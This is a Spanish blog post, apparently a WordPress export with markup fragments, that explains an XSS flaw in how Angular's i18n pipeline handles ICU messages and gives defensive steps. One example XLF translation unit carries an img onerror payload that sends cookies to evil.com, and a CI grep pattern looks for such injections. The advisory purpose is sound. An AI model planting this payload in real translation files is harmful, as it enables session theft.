Hace unos d\u00edas me lleg\u00f3 una alerta de seguridad que me llam\u00f3 la atenci\u00f3n: una vulnerabilidad XSS en el pipeline de internacionalizaci\u00f3n de Angular. Siendo alguien que ha trabajado con Angular i18n en proyectos reales, quise entender bien de qu\u00e9 se trata antes de escribir sobre esto. Lo que encontr\u00e9 es interesante \u2014 no es el XSS t\u00edpico que uno imagina.<\/p>\n
La vulnerabilidad afecta el sistema de internacionalizaci\u00f3n (i18n) de Angular, espec\u00edficamente en los mensajes ICU (International Components for Unicode<\/em>). En pocas palabras: el HTML dentro de traducciones ICU no estaba siendo sanitizado correctamente, lo que permit\u00eda ejecutar JavaScript arbitrario.<\/p>\n CVSS Score: 7.6 HIGH<\/strong> (CVSS 4.0)<\/p>\n El flujo de i18n en Angular tiene tres pasos bien definidos:<\/p>\n El problema est\u00e1 en el paso 2. Muchas empresas tercerizan las traducciones \u2014 mandan los archivos Un ejemplo de mensaje ICU malicioso podr\u00eda verse as\u00ed:<\/p>\n Al renderizar ese ICU message, Angular ejecutaba el JavaScript embebido.<\/p>\n Este no es un XSS que cualquier usuario puede disparar. Para que funcione se necesita:<\/p>\n Desde mi experiencia, el punto m\u00e1s cr\u00edtico es el primero. En proyectos donde trabaj\u00e9, los archivos de traducci\u00f3n viajan por email, Slack, o plataformas como Crowdin o Phrase. Ese vector es m\u00e1s realista de lo que parece.<\/p>\n Lo primero y m\u00e1s importante. Si us\u00e1s npm:<\/p>\n Para actualizar a una versi\u00f3n espec\u00edfica parcheada:<\/p>\n Si no pod\u00e9s parchear de inmediato, un CSP estricto bloquea la ejecuci\u00f3n de JavaScript no autorizado. En tu O mejor a\u00fan, configuralo en tu servidor\/proxy para mayor efectividad.<\/p>\n Antes de hacer el build de producci\u00f3n, valid\u00e1 que los archivos de traducci\u00f3n recibidos de terceros no contengan HTML o scripts embebidos. Pod\u00e9s agregar una validaci\u00f3n en tu pipeline de CI:<\/p>\n Hay algo que no mencion\u00e9 en la versi\u00f3n inicial del post y que me parece importante agregar: Angular 18 y todas las versiones anteriores no tienen parche oficial disponible<\/strong>. El equipo de Angular no va a backportear la correcci\u00f3n porque esas versiones alcanzaron su end-of-life (EOL).<\/p>\n Si tu aplicaci\u00f3n corre sobre Angular 18 o anterior, tus opciones son:<\/p>\n En mi opini\u00f3n, si us\u00e1s Angular 18 o anterior en producci\u00f3n con i18n, esto deber\u00eda ser una se\u00f1al de que la migraci\u00f3n no puede seguir postergando. La deuda t\u00e9cnica eventualmente cobra intereses \u2014 y a veces en forma de CVE.<\/p>\n Lo que me parece interesante de este CVE es que no es el t\u00edpico \u00abel usuario ingresa datos maliciosos\u00bb. Ac\u00e1 el vector es la cadena de suministro de traducciones \u2014 algo en lo que pocas empresas piensan cuando dise\u00f1an su threat model.<\/p>\n En proyectos donde us\u00e9 i18n con Angular, jam\u00e1s se me ocurri\u00f3 auditar los archivos de traducci\u00f3n como potencial vector de ataque. Ahora lo har\u00e9. Y vos tambi\u00e9n deber\u00edas.<\/p>\n El hecho de que requiera comprometer el archivo de traducci\u00f3n lo hace menos probable que un XSS cl\u00e1sico, pero para aplicaciones que manejan credenciales o datos sensibles, el impacto potencial es alto: exfiltraci\u00f3n de cookies, tokens de sesi\u00f3n, o simplemente vandalism de la UI.<\/p>\n Si ves cualquier versi\u00f3n anterior a las parcheadas en la tabla de arriba, actualiz\u00e1. No hay excusa para no hacerlo en este caso \u2014 los cambios son en el core del compilador y no deber\u00edan romper nada en tu c\u00f3digo.<\/p>\n Referencias:<\/strong><\/p>\n CVE-2026-27970 es una vulnerabilidad XSS (CVSS 7.6 HIGH) en el pipeline i18n de Angular que afecta mensajes ICU en Angular 19, Angular 20 y Angular 21. El HTML de traducciones comprometidas no era sanitizado, permitiendo ejecutar JavaScript arbitrario. Analizamos c\u00f3mo funciona el exploit, qu\u00e9 versiones est\u00e1n afectadas y c\u00f3mo proteger tu aplicaci\u00f3n Angular con CSP, Trusted Types y validaci\u00f3n de archivos de traducci\u00f3n.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[273,1],"tags":[274,341,342,343,339,340,268,338],"class_list":["post-1288","post","type-post","status-publish","format-standard","hentry","category-angular","category-blog","tag-angular","tag-angular-19","tag-angular-20","tag-angular-21","tag-cve","tag-i18n","tag-seguridad","tag-xss"],"yoast_head":"\nVector: CVSS:4.0\/AV:N\/AC:L\/AT:P\/PR:N\/UI:P\/VC:H\/VI:H\/VA:N\/SC:N\/SI:N\/SA:N\nCWE-79: Cross-site Scripting (XSS)\n<\/pre>\n
\u00bfC\u00f3mo funciona el ataque?<\/h2>\n
\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Flujo Angular i18n \u2502\n\u2502 \u2502\n\u2502 1. Extracci\u00f3n 2. Traducci\u00f3n 3. Merge \u2502\n\u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\n\u2502 \u2502 ng \u2502\u2500\u2500\u2500▶\u2502 Proveedor \u2502\u2500\u2500▶\u2502 Build final \u2502 \u2502\n\u2502 \u2502 extract \u2502 \u2502 externo \u2502 \u2502 con XLF\/XTB \u2502 \u2502\n\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n\u2502 \u25b2 \u2502\n\u2502 Vector de ataque \u2502\n\u2502 (archivo de traducci\u00f3n \u2502\n\u2502 comprometido) \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n<\/pre>\n
.xlf<\/code> o .xtb<\/code> a una agencia traductora y reciben el resultado. Si esa agencia (o alguien que comprometi\u00f3 sus sistemas) devuelve un archivo con contenido malicioso en un mensaje ICU, Angular lo renderizaba sin sanitizar.<\/p>\n<trans-unit id=\"status-message\">\n <source>{count, plural, =1 {item} other {items}}<\/source>\n <target>{count, plural, =1 {<img src=x onerror=\"fetch('https:\/\/evil.com\/steal?c='+document.cookie)\">} other {items}}<\/target>\n<\/trans-unit>\n<\/code><\/pre>\nCondiciones necesarias para el exploit<\/h2>\n
\n
.xlf<\/code>, .xtb<\/code>, etc.)<\/li>\nVersiones afectadas y parches<\/h2>\n
\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Rama \u2502 Versi\u00f3n afectada \u2502 Versi\u00f3n parcheada\u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 Angular 21.x \u2502 < 21.2.0 \u2502 21.2.0 \u2502\n\u2502 Angular 21.1.x \u2502 < 21.1.16 \u2502 21.1.16 \u2502\n\u2502 Angular 20.3.x \u2502 < 20.3.17 \u2502 20.3.17 \u2502\n\u2502 Angular 19.2.x \u2502 < 19.2.19 \u2502 19.2.19 \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n<\/pre>\n
C\u00f3mo protegerte<\/h2>\n
1. Actualiz\u00e1 Angular<\/h3>\n
ng update @angular\/core @angular\/cli\n<\/code><\/pre>\n# Para Angular 20\nnpm install @angular\/core@20.3.17 @angular\/common@20.3.17\n\n# Para Angular 19\nnpm install @angular\/core@19.2.19 @angular\/common@19.2.19\n<\/code><\/pre>\n2. Habilit\u00e1 Content Security Policy (CSP)<\/h3>\n
index.html<\/code>:<\/p>\n<meta http-equiv=\"Content-Security-Policy\" \n content=\"default-src 'self'; script-src 'self'; object-src 'none';\">\n<\/code><\/pre>\n3. Habilit\u00e1 Trusted Types<\/h3>\n
<meta http-equiv=\"Content-Security-Policy\" \n content=\"require-trusted-types-for 'script'; trusted-types angular;\">\n<\/code><\/pre>\n4. Revis\u00e1 tus archivos de traducci\u00f3n<\/h3>\n
# Ejemplo b\u00e1sico: buscar patrones sospechosos en archivos XLF\ngrep -r \"onerror\\|onclick\\|javascript:\\|<script\" src\/locale\/*.xlf && echo \"WARNING: Suspicious content found!\" || echo \"OK\"\n<\/code><\/pre>\n⚠️ Angular 18 y anteriores: sin parche oficial<\/h2>\n
\n
Mi opini\u00f3n sobre este CVE<\/h2>\n
Verific\u00e1 tu versi\u00f3n ahora<\/h2>\n
ng version | grep \"Angular:\"\n<\/code><\/pre>\n\n